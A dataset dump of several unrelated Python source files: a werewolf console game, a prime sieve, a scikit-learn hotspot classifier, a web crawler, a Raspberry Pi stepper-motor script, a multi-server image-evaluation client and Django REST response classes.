werewolf => asking who user wants to kill tonight\n if self.userId == self.werewolfId:\n lst = list(self.playerControl.values()) #print alive players\n print(\"Alive player(s):\"), print(*lst, sep=', ')\n select = input(self.userId + \" >> Werewolf, pick someone to kill tonight: \")\n \n if select in self.playerControl.values():\n # Avoid user enter their own userId\n if select != self.userId:\n for char, userName in self.playerControl.items():\n if select == userName:\n print(\">> You chose {0} - {1}\".format(userName, char))\n self.victimId = userName\n self.victimChar = char\n break\n else:\n print(\">> You can't choose yourself!\")\n return self.nightMode()\n else:\n print(\">> Please enter valid input!\")\n return self.nightMode()\n\n # If user is villager => Setup werewolf automatically\n else:\n print(\">> Close your eyes\")\n lst = list(self.playerControl.values())\n lst.remove(self.werewolfId)\n val = random.choice(lst)\n for char, userName in self.playerControl.items():\n if val == userName:\n self.victimId = userName\n self.victimChar = char\n break\n\n self.dayNightControl = 1\n return self.checkingMode()\n\n def dayMode(self):\n print(\"--------DAY MODE--------\")\n\n\n # Werewolf eliminates victim\n if self.victimId in self.playerControl.values():\n print(\">> The werewolf killed {0} - {1}\".format(self.victimId, self.victimChar))\n del self.playerControl[self.victimChar], self.votingControl[self.victimId]\n\n lst = list(self.playerControl.values()) # print alive players\n print(\"Alive player(s):\"), print(*lst, sep=', ')\n\n self.checkWin()\n self.voting()\n self.dayNightControl = 0\n self.checkingMode()\n\n def voting(self):\n\n electId = None\n electChar = None\n lst = list(self.playerControl.values())\n\n if self.userId == self.werewolfId:\n self.ifPlayerIsWolf()\n elif self.userId not in self.playerControl.values():\n self.ifPlayerIsDie()\n else:\n self.ifPlayerIsVillager()\n\n maxVote = sorted(self.votingControl.values())\n for userName, voteCounter in self.votingControl.items():\n if voteCounter == maxVote[-1]:\n electId = userName\n break\n for char, userName in self.playerControl.items():\n if electId == userName:\n electChar = char\n break\n\n print(\">> {0} - {1} is eliminated!\".format(electId, electChar))\n lst.remove(electId) # print alive players\n del self.votingControl[electId], self.playerControl[electChar]\n print(\"Alive player(s):\"), print(*lst, sep=', ')\n\n self.checkWin()\n self.dayNightControl = 0\n self.checkingMode()\n\n def ifPlayerIsWolf(self):\n vote = input(self.userId + \" >> Who do you want to vote? \")\n if vote == self.werewolfId:\n print(\">> You can't choose yourself!\")\n return self.ifPlayerIsWolf()\n else:\n self.votingControl[vote] += 1\n \n # Allow other player(s) to vote\n lst = list(self.playerControl.values())\n for numPlayer in range(len(lst)-1): \n val = random.choice(lst)\n self.votingControl[val] +=1\n\n\n def ifPlayerIsVillager(self):\n vote = input(self.userId + \" >> Who do you want to vote? \")\n if vote == self.userId:\n print(self.userId + \" >> You can't choose yourself!\")\n return self.ifPlayerIsVillager()\n else:\n self.votingControl[vote] += 1\n return\n\n def ifPlayerIsDie(self):\n return\n\n def checkWin(self):\n if 'werewolf' not in self.playerControl.keys():\n lst = list(self.playerControl.values())\n print(\"Alive player(s):\"), print(*lst, sep=', ')\n print(\">> Villagers won!\")\n exit(0)\n elif self.playerControl == {'werewolf': self.werewolfId}:\n lst = list(self.playerControl.values())\n print(\"Alive player(s):\"), print(*lst, sep=', ')\n print(\">> Werewolf won!\")\n exit(0)\n else:\n pass\n\nplyList = [\"player0\", \"player1\", \"player2\", \"player3\",]\nuserId = random.choice(plyList)\n\ndef mainGame(player):\n obj = Werewolf(player)\n obj.controlList()\n obj.playingOrNot()\n\nmainGame(userId)\n\n\n\n\n","sub_path":"werewolfGame.py","file_name":"werewolfGame.py","file_ext":"py","file_size_in_byte":7401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"483227925","text":"import os\r\nos.chdir('C:/lab7/Bratun')\r\n\r\ndef get_lines():\r\n with open(r'51.txt', \"r\", encoding=\"utf‐8\") as f:\r\n tmp = f.readlines()\r\n f.close()\r\n return tmp\r\n\r\nlines = get_lines()\r\n\r\nnew_file_lines = []\r\n\r\ndef filelength():\r\n for i in range(len(lines)):\r\n if len(lines[i]) % 2 == 0:\r\n new_file_lines.append(lines[i])\r\n\r\nfilelength()\r\n\r\nwith open(r'52.txt', \"w\", encoding=\"utf‐8\") as f:\r\n for i in new_file_lines:\r\n f.write(i)\r\n f.close()\r\n","sub_path":"I семестр/Програмування (Python)/Лабораторні/Братун 6305/Labs/LABA7/third(2).py","file_name":"third(2).py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"277691438","text":"__author__ = 'joduncan'\n\ndef find(limit):\n # 0. copy Ruby implementation.\n # 1. create dict with keys up to (and including) the limit.\n possible_primes = { key: True for key in range(limit+1) }\n # 2. filter using sieve.\n possible_primes[0] = False\n possible_primes[1] = False\n for possible_prime in sorted(possible_primes.keys()):\n # == True is technically unnecessary, but sometimes it's helpful to be explicit.\n if possible_primes[possible_prime] == True:\n sieve(possible_prime, limit, possible_primes)\n # 3. return all keys whose values are true.\n # slightly more verbose/explicit, but apparently unnecessary (and less pythonic)\n #return [ key for key in possible_primes.keys() if possible_primes[key] == True ]\n return [ key for key in possible_primes if possible_primes[key] == True ]\n\ndef sieve(prime, limit, numbers):\n # no need to go through all numbers up to the limit, the biggest multiple will be around the value of limit/prime\n multiples = [x for x in range(prime, (limit/prime)+1) if x * prime <= limit]\n for x in multiples:\n numbers[prime*x] = False","sub_path":"eulers/10/python/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"256586186","text":"# -*- coding:utf-8 -*-\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n# from sklearn.ensemble import GradientBoostingClassifier\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.datasets import make_classification\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import (RandomTreesEmbedding, RandomForestClassifier,\r\n GradientBoostingClassifier)\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import roc_curve\r\nfrom sklearn.pipeline import make_pipeline\r\n\r\ndef getConservation(filename):\r\n file = open(filename)\r\n listConservation = []\r\n str = file.readline()\r\n for astr in str.split(', '):\r\n listConservation.append(int(astr))\r\n return (listConservation)\r\n\r\nlistConservation = getConservation(r'skempiconservation.txt')\r\ndf = pd.read_excel(r'../../excell/450_3.xlsx')\r\n\r\n# print (df)\r\n# gbdt=GradientBoostingClassifier(n_estimators=200)\r\n\r\ny_train = np.arange(400)\r\ny_test = np.arange(50)\r\nlist1 = list(df.ix[0:400, 7])\r\nlist2 = list(df.ix[400:450, 7])\r\nfor i in range(400):\r\n y_train[i] = list1[i]\r\nfor i in range(50):\r\n y_test[i] = list2[i]\r\nX_train = np.zeros((400, 6))\r\nX_test = np.zeros((50, 6))\r\nlist3 = []\r\nfor j in range(5):\r\n # print(df.ix[:, j])\r\n # print(j)\r\n list3.append(list(df.ix[:, j + 8]))\r\n# print(list3)\r\n# list3.append(list(df.ix[: , 26]))\r\n# list3.append(list(df.ix[: , 27]))\r\nfor j in range(5):\r\n for i in range(400):\r\n X_train[i][j] = list3[j][i]\r\nfor i in range(400):\r\n X_train[i][5] = listConservation[i]\r\nprint(X_train.shape)\r\nfor j in range(5):\r\n for i in range(50):\r\n X_test[i][j] = list3[j][400 + i]\r\nfor i in range(50):\r\n X_test[i][5] = listConservation[400+i]\r\nX_train = X_train[:, [5]]\r\nx_train = X_train.mean()\r\nX_train = X_train-x_train\r\nX_test = X_test[:, [5]]\r\nx_test = X_test.mean()\r\nX_test = X_test - x_test\r\n\r\n# t = np.arctan2(X_test, y_test)\r\n\r\nplt.plot(listConservation[0:400], list(df.ix[0:399, 7]), 'ro')\r\nplt.axis([-8, 8, 0, 1])\r\nplt.show()\r\n\r\n\r\n# print (X_train.shape, y_train.shape, X_test.shape, y_test.shape)\r\n'''\r\nX_train, X_train_lr, y_train, y_train_lr = train_test_split(X_train,\r\n y_train,\r\n test_size=0.5)\r\nn_estimator = 10\r\ngrd = GradientBoostingClassifier(n_estimators=n_estimator)\r\ngrd_enc = OneHotEncoder()\r\ngrd_lm = LogisticRegression()\r\ngrd.fit(X_train, y_train)\r\ngrd_enc.fit(grd.apply(X_train)[:, :, 0])\r\ngrd_lm.fit(grd_enc.transform(grd.apply(X_train_lr)[:, :, 0]), y_train_lr)\r\n\r\ny_pred_grd_lm = grd_lm.predict_proba(\r\n grd_enc.transform(grd.apply(X_test)[:, :, 0]))[:, 1]\r\nfpr_grd_lm, tpr_grd_lm, _ = roc_curve(y_test, y_pred_grd_lm)\r\n\r\n\r\n# The gradient boosted model by itself\r\ny_pred_grd = grd.predict_proba(X_test)[:, 1]\r\nfpr_grd, tpr_grd, _ = roc_curve(y_test, y_pred_grd)\r\n\r\nplt.figure(1)\r\nplt.plot([0, 1], [0, 1], 'k--')\r\n# plt.plot(fpr_rt_lm, tpr_rt_lm, label='RT + LR')\r\n#plt.plot(fpr_rf, tpr_rf, label='RF')\r\n#plt.plot(fpr_rf_lm, tpr_rf_lm, label='RF + LR')\r\nplt.plot(fpr_grd, tpr_grd, label='GBT')\r\n# plt.plot(fpr_grd_lm, tpr_grd_lm, label='GBT + LR')\r\nplt.xlabel('False positive rate')\r\nplt.ylabel('True positive rate')\r\nplt.title('ROC curve')\r\nplt.legend(loc='best')\r\nplt.show()\r\n\r\nplt.figure(2)\r\nplt.xlim(0, 1)\r\nplt.ylim(0.8, 1)\r\nplt.plot([0, 1], [0, 1], 'k--')\r\n#plt.plot(fpr_rt_lm, tpr_rt_lm, label='RT + LR')\r\n#plt.plot(fpr_rf, tpr_rf, label='RF')\r\n#plt.plot(fpr_rf_lm, tpr_rf_lm, label='RF + LR')\r\nplt.plot(fpr_grd, tpr_grd, label='GBT')\r\n#plt.plot(fpr_grd_lm, tpr_grd_lm, label='GBT + LR')\r\nplt.xlabel('False positive rate')\r\nplt.ylabel('True positive rate')\r\nplt.title('ROC curve (zoomed in at top left)')\r\nplt.legend(loc='best')\r\nplt.show()\r\n'''\r\nparams = {'n_estimators': 1000, 'max_depth': 3, 'subsample': 0.5,\r\n 'learning_rate': 0.015, 'min_samples_leaf': 1, 'random_state': 3}\r\nclf = GradientBoostingClassifier(**params)\r\n\r\nclf.fit(X_train, y_train)\r\nacc = clf.score(X_test, y_test)\r\nprint(\"Accuracy: {:.4f}\".format(acc))\r\npred = clf.predict(X_test)\r\n# print(pred,y_test)\r\nacc1 = 0\r\ntp = 0\r\nfn = 0\r\nfp = 0\r\n'''\r\nfor i in range(49):\r\n if pred[i] == y_test[i]:\r\n acc1 = acc1 + 1\r\n if pred[i] == 1:\r\n tp = tp + 1\r\n elif pred[i] == 0 and y_test[i] == 1:\r\n fn = fn + 1\r\n else:\r\n fp = fp + 1\r\nprint(tp, fn, fp)\r\nre = tp / (tp + fn)\r\npre = tp / (tp + fp)\r\nfscore = 2 * re * pre / (re + pre)\r\nprint(re, pre, fscore)\r\nprint(\"Accuracy: {:.4f}\".format(acc))\r\n'''","sub_path":"GBDThotspottest.py","file_name":"GBDThotspottest.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"474490932","text":"import urllib.request\nimport requests\nimport random\nimport json\n\ntry:\n import log\nexcept:\n from . import log\ntry:\n import useragents\nexcept ModuleNotFoundError:\n try:\n from . import useragent\n except:\n 'Module useragent do not exists'\ntry:\n from parseconfig import Parse\nexcept ModuleNotFoundError:\n try:\n from .parseconfig import Parse\n except:\n 'Module parseconfig do not exists'\n\nimport gzip\nimport http.client\nimport urllib.error\nimport urllib.parse\n\n\nclass Crawl:\n\n def __init__(self, url, timeout=5, encoding='utf8', maxtime=5, data=None, isProxy=False, proxyPools=None, crawlConfig=None, urlConfig=None, dateType='str', **kwargs):\n self.url = url\n self.timeout = timeout\n self.maxtime = maxtime\n self.encoding = encoding\n self.data = data\n self.dataType = dateType\n self.isProxy = isProxy\n self.proxyPools = proxyPools\n self.crawlConfig = crawlConfig\n self.urlConfig = urlConfig\n\n self.protocol = url[:url.find(':')]\n self.kwargs = kwargs\n\n self.html = None\n\n self.parse_config()\n self.run()\n\n def get_proxy(self):\n if self.proxyPools:\n self.isProxy = True\n self.proxyData = {self.protocol: 'http://' + random.choice(self.proxyPools)}\n else:\n self.proxyData = {}\n return self.proxyData\n\n def parse_config(self):\n urlConfig_ = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0'}\n\n crawlConfig_ = {'timeout': self.timeout,\n 'encoding': self.encoding,\n 'maxtime': self.maxtime}\n\n if not self.urlConfig:\n urlConfig_.update(\n {x.replace('_', '-'): self.kwargs[x] for x in self.kwargs if 65 <= ord(str(x)[0]) <= 90 and self.kwargs[x]})\n\n else:\n urlConfig_.update({x: self.urlConfig[x] for x in self.urlConfig if 65 <= ord(str(x)[0]) <= 90 and self.urlConfig[x]})\n\n if not self.crawlConfig:\n crawlConfig_.update({x: self.kwargs[x] for x in self.kwargs if\n type(x) == str and self.kwargs[x] is not None and x in ['maxtime', 'timeout', 'encoding']})\n else:\n crawlConfig_.update({x: self.kwargs[x] for x in self.crawlConfig if\n type(x) == str and self.crawlConfig[x] is not None and x in ['maxtime', 'timeout', 'encoding']})\n\n self.urlConfig, self.crawlConfig = urlConfig_, crawlConfig_\n # self.urlConfig = list(map(lambda x:(x, self.urlConfig[x]), self.urlConfig))\n\n try:\n if Parse.crawlConfig['shuffle']:\n self.urlConfig['User-Agent'] = random.choice(useragents.userAgents)\n except:\n pass\n\n def run(self):\n index = 0\n while index <= self.crawlConfig['maxtime']:\n try:\n try:\n if self.isProxy or self.proxyPools:\n proxy = self.get_proxy()\n proxyHandler = urllib.request.ProxyHandler(proxy)\n opener = urllib.request.build_opener(proxyHandler)\n else:\n opener = urllib.request.build_opener()\n if not self.data:\n req = urllib.request.Request(self.url, headers=self.urlConfig)\n else:\n if self.dataType == 'json':\n data = json.dumps(self.data)\n else:\n data = urllib.parse.urlencode(self.data)\n data = data.encode('utf8')\n req = urllib.request.Request(self.url, headers=self.urlConfig, data=data)\n res = opener.open(req)\n if res.status != 200:\n raise Exception('status code is not 200 ! ')\n self.html = res.read().decode(self.crawlConfig['encoding'], errors='ignore')\n opener.close()\n return self.html\n\n except http.client.BadStatusLine as e:\n index += 1\n log.error('BadStatusLine Error, URL:%s' % self.url)\n\n except urllib.error.URLError as e:\n index += 0.2\n log.error('URLError, URL:%s, ERROR:%s' % (self.url, str(e)))\n\n except Exception as e:\n index += 1\n log.error('Other Error, URL:%s, ERROR:%s' % (self.url, str(e)))\n except Exception as e:\n index += 1\n log.critical('...' + str(e))\n log.critical('Index is over than %s times,crawl fail, URL;%s' % (self.crawlConfig['maxtime'], self.url))\n self.html = None\n\n\ncrawl = Crawl\n","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"257609823","text":"import RPi.GPIO as GPIO\r\nimport time\r\nGPIO.setmode(GPIO.BOARD)\r\ncontrol_pins = [7, 11, 13, 15]\r\nfor pin in control_pins:\r\n GPIO.setup(pin, GPIO.OUT)\r\n GPIO.output(pin, 0)\r\nhalfstep_seq = [\r\n [1, 0, 0, 0],\r\n [1, 1, 0, 0],\r\n [0, 1, 0, 0],\r\n [0, 1, 1, 0],\r\n [0, 0, 1, 0],\r\n [0, 0, 1, 1],\r\n [0, 0, 0, 1],\r\n [1, 0, 0, 1]\r\n]\r\nfor i in range(512):\r\n for halfstep in range(8):\r\n for pin in range(4):\r\n GPIO.output(control_pins[pin], halfstep_seq[halfstep][pin])\r\n time.sleep(0.001)\r\n\r\n# Attempt at moving in opposite direction\r\nfor i in range(512):\r\n for halfstep in reversed(range(8)):\r\n for pin in reversed(range(4)):\r\n GPIO.output(control_pins[pin], halfstep_seq[halfstep][pin])\r\n time.sleep(0.001)\r\n\r\nGPIO.cleanup()\r\n","sub_path":"test_stepper_py.py","file_name":"test_stepper_py.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"308909180","text":"import requests\nfrom multiprocessing.pool import ThreadPool\nfrom io import BytesIO\nimport math\nfrom threading import Thread\nimport numpy as np\nfrom random import shuffle\n\nfrom PIL import Image\nimport cv2\nfrom timeit import default_timer as timer\n\nclass Connection(object):\n \"\"\"\n Holds connection to server(s), handles sending and receiving to and from the right one.\n \"\"\"\n\n def __init__(self, settings, history):\n self.settings = settings\n self.history = history\n self.hard_stop = False # hard break of code\n\n # indicates if we are connecting to server(s)\n if self.settings.client_server:\n # init Connection\n\n self.server_ports_suggestions = self.settings.server_ports_list\n self.server_ports_list = []\n self.server_ports_number_of_requests = {}\n self.number_of_server_machines = 0\n self.server_names = {} # port -> server name\n\n # Split machines to attention and final evaluation\n # total N - self.reserve_machines_for_attention will go to final evaluation\n self.reserve_machines_for_attention = self.settings.reserve_machines_for_attention\n\n self.handshake()\n\n if self.settings.precompute_attention_evaluation:\n self.prepare_attention_evaluation_server_lists()\n\n if self.settings.debug_just_handshake:\n self.hard_stop = True\n\n self.pool = ThreadPool()\n\n\n self.times_del = []\n\n def handshake(self):\n if self.settings.verbosity >= 2:\n print(\"Connection init, handshake\")\n\n servers_dedicated_for_precompute = self.reserve_machines_for_attention\n failed_on_ports = []\n for port in self.server_ports_suggestions:\n try:\n HANDSHAKE_API_URL = \"http://localhost:\" + port + \"/handshake\"\n backup_name = port\n payload = {\"client\": \"Hi, I am Bob.\", \"backup_name\": backup_name}\n\n start = timer()\n r = requests.post(HANDSHAKE_API_URL, files=payload).json()\n end = timer()\n\n if r[\"success\"]:\n if self.settings.verbosity >= 1:\n print(\"Connection with server on port\",port,\"established. Time:\", (end - start), \"Request data:\", r)\n\n server_name = r[\"server_name\"]\n\n if self.settings.precompute_attention_evaluation:\n if servers_dedicated_for_precompute > 0:\n server_name += '_Att'\n servers_dedicated_for_precompute -= 1\n\n self.server_names[port] = server_name\n\n self.server_ports_list.append(port)\n self.server_ports_number_of_requests[port] = 0\n else:\n failed_on_ports.append(port)\n\n except Exception:\n failed_on_ports.append(port)\n\n if self.settings.verbosity >= 1:\n print(\"FAILED on ports:\", \" \".join(failed_on_ports))\n print(\"SUCCESS on ports:\", \" \".join(self.server_ports_list))\n print(\"machine names:\", self.server_names)\n\n self.number_of_server_machines = len(self.server_ports_list)\n if (self.number_of_server_machines == 0):\n print(\"Connection to all servers failed! Backup solution = turning to local evaluation, no precomputing allowed.\")\n self.settings.client_server = False\n self.settings.precompute_attention_evaluation = False\n if (self.number_of_server_machines < 2):\n print(\"Only one server connected! No precomputing allowed.\")\n self.settings.precompute_attention_evaluation = False\n\n # limiter\n if self.settings.final_evaluation_limit_servers > 0:\n t = 0\n if self.settings.precompute_attention_evaluation:\n t = self.reserve_machines_for_attention\n for_final = len(self.server_ports_list) - t\n #print(for_final,\"vs\",self.settings.final_evaluation_limit_servers)\n\n if self.settings.final_evaluation_limit_servers < for_final:\n self.server_ports_list = self.server_ports_list[0:self.settings.final_evaluation_limit_servers+t]\n print(\"Limiting number of final-evaluation-servers to\",len(self.server_ports_list),\":\",self.server_ports_list)\n self.number_of_server_machines = len(self.server_ports_list)\n\n\n def prepare_attention_evaluation_server_lists(self):\n N = self.number_of_server_machines\n\n if N > 1:\n # now we can split\n self.attention_machines_ports = []\n self.evaluation_machines_ports = []\n\n for i in range(self.reserve_machines_for_attention):\n self.attention_machines_ports.append(self.server_ports_list[i])\n\n for i in range(self.reserve_machines_for_attention, N):\n self.evaluation_machines_ports.append(self.server_ports_list[i])\n\n if self.settings.verbosity >= 1:\n print(\"attention_machines_ports\", self.attention_machines_ports)\n print(\"evaluation_machines_ports\", self.evaluation_machines_ports)\n\n def evaluate_crops_on_server(self, crops, ids_of_crops, type):\n # will be more advanced\n # like splitting to all available servers\n N = self.number_of_server_machines\n\n if N > 1:\n #print(\"ON MULTIPLE MACHINES\", N, \"(att:\",len(self.attention_machines_ports),\", eval:\",len(self.evaluation_machines_ports),\")\")\n result, times_encode, times_eval, times_decode, times_transfer = self.split_across_list_of_servers(crops, ids_of_crops, type)\n else:\n port = self.server_ports_list[0]\n result,time_Encode, time_Evaluation, time_Decode, time_Transfer = self.direct_to_server(crops, ids_of_crops, port)\n times_encode = [time_Encode]\n times_eval = [time_Evaluation]\n times_decode = [time_Decode]\n times_transfer = [time_Transfer]\n return result, times_encode, times_eval, times_decode, times_transfer\n\n def split_across_list_of_servers(self, crops, ids_of_crops, type):\n\n # Scheduling task, idea/heuristic:\n #\n # hold two lists of servers reserved for two tasks:\n # - regular evaluation\n # - precomputing (attention) evaluation in advance\n # simple version, from N servers:\n # - 1 precomputing // scale -> 2 ...\n # - N-1 final evaluations // scale -> N-2 ...\n # if N=1, then use the direct method\n #\n # we want to prevent:\n # a.) precomputing slowing down real evaluation\n # b.) precomputing not being done fast enough\n\n ports_list = []\n if self.settings.precompute_attention_evaluation:\n if type == 'attention':\n ports_list = self.attention_machines_ports\n elif type == 'evaluation':\n ports_list = self.evaluation_machines_ports\n else:\n ports_list = self.server_ports_list\n\n shuffle(ports_list)\n\n N = len(ports_list)\n C = len(crops)\n\n if self.settings.verbosity >= 3:\n print(\"[Connection to multiple servers] We can split\",C,\"crops on\",N,\" machines as \",(C/N),\" per each (type\",type,\")\")\n print(\"all ids:\",ids_of_crops)\n\n results = [[]]*(max(ids_of_crops)+1)\n threads = []\n\n id_of_indices_0_to_C = range(0,C)\n id_splits = np.array_split(id_of_indices_0_to_C, N)\n #print(\"id_splits\",id_splits)\n\n num_of_actual_threads = 0\n for ids in id_splits:\n if len(ids)>0:\n num_of_actual_threads+=1\n\n times_eval = [[]]*(num_of_actual_threads)\n times_transfer = [[]]*(num_of_actual_threads)\n times_encode = [[]]*(num_of_actual_threads)\n times_decode = [[]]*(num_of_actual_threads)\n\n #print(\"corresponds to crops\", np.array_split(ids_of_crops, N))\n\n for i,ids in enumerate(id_splits):\n if len(ids)==0:\n continue\n\n sub_crops = [crops[id] for id in ids]\n sub_ids = [ids_of_crops[id] for id in ids]\n port = ports_list[i]\n\n if self.settings.verbosity >= 3:\n print(port, self.server_names[port], \"> with len=\",len(sub_crops), \"of ids:\", sub_ids)\n\n # start a new thread to call the API\n t = Thread(target=self.eval_subset_and_save_to_list, args=(sub_crops, sub_ids, port, results, i, times_eval, times_transfer, times_encode, times_decode))\n t.daemon = True\n t.start()\n threads.append(t)\n\n for t in threads:\n t.join()\n\n if self.settings.verbosity >= 3:\n print(\"All threads finished, assuming we have all the ids from\", ids_of_crops)\n\n results_tmp = []\n\n for i,r in enumerate(results):\n if len(r) > 0:\n results_tmp.append(r)\n\n results = results_tmp\n\n if self.settings.verbosity >= 3:\n print(\"results = \", results)\n\n return results, times_encode, times_eval, times_decode, times_transfer\n\n # thread function\n def eval_subset_and_save_to_list(self, crops, ids_of_crops, port, results, ith, times_eval, times_transfer, times_encode, times_decode):\n evaluation,time_Encode, time_Evaluation, time_Decode, time_Transfer = self.direct_to_server(crops, ids_of_crops, port)\n times_eval[ith] = time_Evaluation\n times_transfer[ith] = time_Transfer\n times_encode[ith] = time_Encode\n times_decode[ith] = time_Decode\n #print(\"times[ith]\", ith, \" = \", time)\n\n for uid,bbox in evaluation:\n results[uid] = [uid,bbox]\n #results[uid] = [uid]\n\n self.history.report_evaluation_per_specific_server(self.server_names[port], time_Encode, time_Evaluation, time_Decode, time_Transfer)\n\n\n def direct_to_server(self, crops, ids_of_crops, port):\n\n EVALUATE_API_URL = \"http://localhost:\" + port + \"/evaluate_image_batch\"\n\n number_of_images = len(crops)\n\n payload = {}\n\n\n t0 = timer()\n encoded_images = self.pool.map(lambda i: (\n cv2.imencode('.jpg', i)[1].tostring()\n ), crops)\n\n for i in range(number_of_images):\n #image = crops[i]\n #image_enc = cv2.imencode('.jpg', image)[1].tostring()\n image_enc = encoded_images[i]\n id = ids_of_crops[i]\n payload[str(id)] = image_enc\n\n \"\"\"\n if self.settings.opencv_or_pil != 'PIL':\n # TODO: MAYBE INEFFICIENT, back to PIL for sending\n image = Image.fromarray(image)\n\n memory_file = BytesIO()\n image.save(memory_file, \"JPEG\")\n memory_file.seek(0)\n\n id = ids_of_crops[i]\n payload[str(id)] = memory_file\n \"\"\"\n t1 = timer()\n time_Encode = t1-t0\n if self.settings.verbosity >= 2:\n print(number_of_images,\"Image(s) encoding (with\",self.settings.opencv_or_pil,\") took = \", time_Encode, \"(during the eval)\")\n\n if number_of_images == 0:\n print(\"Careful, 0 images, don't send.\")\n return [],0\n\n start = timer()\n # submit the request\n try:\n r = requests.post(EVALUATE_API_URL, files=payload).json()\n except Exception as e:\n print(\"CONNECTION TO SERVER \",EVALUATE_API_URL,\" FAILED - return to backup local evaluation?\")\n print(\"Exception:\", e)\n\n end = timer()\n time_EvaluationAndTransfer = end - start\n if self.settings.verbosity >= 2:\n print(\"Server on port\",port,\" evaluated\", len(crops), \"crops. Time:\", time_EvaluationAndTransfer, \"Request data:\", r)\n\n uids = r[\"uids\"]\n bboxes = r[\"bboxes\"]\n\n time_Evaluation = float(r[\"time_pure_eval\"])\n time_Decode = float(r[\"time_pure_decode\"])\n time_Transfer = time_EvaluationAndTransfer - time_Evaluation - time_Decode\n\n #print(\"uids\", uids)\n #print(\"bboxes len\", len(bboxes))\n # currently UIDS are ordered, this will not be true of multiple servers though\n\n evaluation = []\n for i,bbox in enumerate(bboxes):\n evaluation.append([int(uids[i]), bbox])\n\n # We want evaluation in format:\n # array of crops in order by coordinates_id\n # each holds id and array of dictionaries for each bbox {} keys label, confidence, topleft, bottomright\n #print(\"evaluation\", evaluation)\n\n return evaluation, time_Encode, time_Evaluation, time_Decode, time_Transfer\n\n","sub_path":"video_parser_v2/Connection.py","file_name":"Connection.py","file_ext":"py","file_size_in_byte":12744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"135950348","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\n@author: Walter\r\n\"\"\"\r\n\"\"\"\r\nCreacion de gráfico en base a la tabla itinerario,\r\nmediante el uso de contenedores tipos lista,\r\npresente en la página 41 del Texto del Estudiante de Física 2018.\r\n\"\"\"\r\n#import numpy as np #libreria util para calculos matematicos (http://www.numpy.org/)\r\nimport matplotlib.pyplot as plt #libreria util para realizar graficos (https://matplotlib.org/gallery.html)\r\nimport webbrowser #abrir archivos desde directorio\r\n\r\n#Tabla Itinerario\r\n\r\ntiempo = [0,1,2,3]#listas\r\nposicion = [0,5,10,15]#listas\r\n\r\n#Grafica de la tabla\r\nfig = plt.figure() #construccion figura\r\nax = fig.add_subplot(111) #construccion subplot\r\nxs = tiempo #eje x\r\nys = posicion #eje y\r\n#Titulo del grafico\r\nplt.title(\"Gráfico Posición vs Tiempo \\n Movimiento Rectilíneo Uniforme\")\r\n#Construccion grafico\r\nax.plot(xs, ys)\r\n#Limite de los ejes\r\nax.set_ylim(ymin=0)\r\nax.set_xlim(xmin=0)\r\n#Nombre de los ejes\r\nplt.ylabel(\"Posicion [m]\")\r\nplt.xlabel(\"Tiempo[s]\")\r\n#Guardar Imagen\r\nplt.savefig(\"Grafico MRU-lista.png\")\r\n#abrir imagen\r\nplt.show()\r\n#abrir imagen desde archivo\r\nwebbrowser.open(\"Grafico MRU-lista.png\")\r\n\r\n\r\n","sub_path":"Grafico MRU-Lista.py","file_name":"Grafico MRU-Lista.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"220780680","text":"from rest_framework.response import Response\n\n\nclass ResponseOk(Response):\n\n status_code = 200\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 1, \"message\": \"OK\", \"status\": 200}\n if isinstance(data, str):\n data = {\"success\": 1, \"message\": data, \"status\": 200}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 1\n if \"status\" not in data.keys():\n data['status'] = 200\n if \"message\" not in data.keys():\n data['message'] = \"OK\"\n super(ResponseOk, self).__init__(data, status=200)\n\n\nclass ResponseNotFound(Response):\n\n status_code = 404\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Not found\", \"status\": 404}\n if isinstance(data, str):\n data = {\"success\": 0, \"error\": data, \"status\": 404}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 404\n if \"error\" not in data.keys():\n data['error'] = \"Not found\"\n super(ResponseNotFound, self).__init__(data, status=404)\n\n\nclass ResponseInternalServerError(Response):\n\n status_code = 500\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Internal Server Error\", \"status\": 500}\n if isinstance(data, str):\n data = {\"success\": 0, \"error\": data, \"status\": 500}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 500\n if \"error\" not in data.keys():\n data['error'] = \"Internal Server Error\"\n super(ResponseInternalServerError, self).__init__(data, status=500)\n\n\nclass ResponseForbidden(Response):\n\n status_code = 403\n\n def __init__(self, data=None):\n if data is None:\n data = {\"success\": 0, \"error\": \"Forbidden\", \"status\": 403}\n if isinstance(data, str):\n data = {\"success\": 0, \"error\": data, \"status\": 403}\n elif isinstance(data, dict):\n if \"success\" not in data.keys():\n data['success'] = 0\n if \"status\" not in data.keys():\n data['status'] = 403\n if \"error\" not in data.keys():\n data['error'] = 